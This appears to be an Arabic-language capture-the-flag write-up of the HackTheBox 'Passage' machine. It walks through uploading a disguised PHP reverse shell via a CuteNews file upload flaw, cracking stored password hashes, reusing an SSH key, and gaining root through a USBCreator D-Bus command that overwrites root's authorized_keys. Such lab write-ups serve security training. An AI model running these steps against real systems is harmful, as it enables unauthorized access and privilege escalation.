Posts Hackthebox passage
Post
Cancel

Hackthebox passage

Desktop View

Sammmry:

نقوم باستغلاله للحصول cute news اثناء جمع المعلومات نجد

ثم نفحص داخل السيرفر نجد نصوص مشفرة نقوم ب user على

ان privesclationثم نجد في عملية user كسرها لنحصل على

نحصل على رووت باستغلاله usb cretorالسيرفر يستخدم

  • 1 recon
    • 1.1 nmap
    • 1.2 exploiting Arbitrary file upload:
      • 1.2.register new user
      • 1.2.2 Preparation the shell
      • 1.2.3 Netcat
      • 1.2.4 Upload shell
      • 1.2.5 Got shell………………………………………………………………………..
    • 1.3 User enemiration
      • 1.3.1 Base64 decode :
      • 1.3.2 Sha256 decode :
      • 1.3.3 Paul login
      • 1.3.4 Ssh private key
    • 1.4 Privilege Escalation
      • 1.3.1 usb cretor :
      • 1.3.1 exploit :

Walkthrough

1 recon

1.1 nmap

nmap نبدا بفحص البورتات باستخدام

Desktop View

نلاحظ وجود 2 بورت

‫الخاص‬ بالويب سيرفر ‫‪:‬‬ ‫‪80‬‬

ssh ‫الخاص‬ ب ‫‪:‬‬ ‫‪22‬‬

80 لنبدا مع

نقوم بالتصفح

Desktop View

عند فتح الصفحة نلاحظ

cutenews في الاسفل ان الموقع يستخدم

cutenews بالبحث عن

عبر جوجل نجد انه

مصاب بثغرة

Arbitrary File Upload

https://www.exploit-db.com/exploits/

1.2 exploiting Arbitrary file upload:

1.2.register new user

نتوجه في البداية الى

http://10.10.10.206/CuteNews

لنقوم بانشاء مستخدم جديد Register ثم نذهب الى

Desktop View

بعد التسجيل نقوم بتسجيل الدخول

Desktop View

1.2.2 Preparation the shell

الخاص بنا يمكنك اجاده هنا php shellنجهز

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

الخاص بك ip ب host قم بتغير ال

(tun0 بجانب ip ad باستخدام امر ipتجد ال)

magic bytes ثم نقوم بوضع

في بداية الملف gif الخاصة ب

Gif8 ;

Desktop View

1.2.3 Netcat

nc listenerقم بتشغيل

: على جهازك باستخدام الامر التالي

1
nc -lnvp 4444

رقم البورت اختر ماتشاء‬ ‫‪:‬‬ ‫‪4444‬‬

Desktop View

1.2.4 Upload shell

الخاص بنا على الموقع shellثم نقوم برفع

save changesثم Choose file

Desktop View

(shell)نقوف بفتح الصورة المرفوعة

Desktop View

Desktop View

1.2.5 Got shell….

: عند فتح الصورة في المتصفح نتحصل على اتصال مع السيرفر

Desktop View

apacheبصلاحية shell تحصلنا على

1.3 User enemiration

نقوم الان بالبحث عن المعلومات داخل السيرفر نجد

بعض النصوص

:مشفرة داخل ملف

/var/www/hml/CuteNews/cdata/users

Desktop View

Desktop View

1.3.1 Base64 decode :

base 64 نقوم بفك تشفير

Desktop View

1.3.2 Sha256 decode :

sha256 نجد كلمة سر مشفرة ب

نقوم بفكها باستخدام موقع

http://crackstation.net

Desktop View

base 64 ومن الكود المشفر ب user paulنجد /homeنذهب اللى atlanta1وان كلمة السر paulفي الاعلى نعلم ان اليوز

1.3.3 Paul login

: نقوم بتسجيل الدخول باستخدام الامر التالي

1
Su paul

Desktop View

1.3.4 Ssh private key

1
2
3
4
/home/paul/.sshعند الدخول الى
private key نجد
نقوم بنسخه ولصقه في جهازك id_rsaفي sshالخاص ب 
قم بتسميته ماتشاء id ملف اسمه

Desktop View

: نغير صلاحيات الملف باستخدام امر

1
Chmod 600 id

: ssh ثم نقوم بالاتصال باستخدام

1
2
Ssh –i id nadav@10.10.10.206

اسم الملف : Id

اليوزر : Nadav

Desktop View

نقوم بعرض جميع الملفات باستخدام الامر

1
ls -la

فنجد ملف تحت اسم

نقوم بعرضه باستخدام الامر .viminfo

1
cat .viminfo

Desktop View

Desktop View

1.4 Privilege Escalation

1.4.1 Usb creator

نبحث عن

في جوجل usb creator dbus privilege escalation

نجد مقال يتحدث عنه

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

1.4.2 exploit

root الخاص ب authorized_keys نقوم بالاستغلال وذلك باستبدال

ثم نتصل من nadav الخاص ب authorized_keys ب

root مباشرة ب nadav

نكتب الامر التالي

1
2
3
4
gdbus call --system --dest com.ubuntu.USBCreator --object-path
/com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image
/home/nadav/.ssh/authorized_keys /root/.ssh/authorized_keys true

root flag :D نقوم بسحب

Desktop View

This post is licensed under CC BY 4.0 by the author.

Trending Tags

Contents

Trending Tags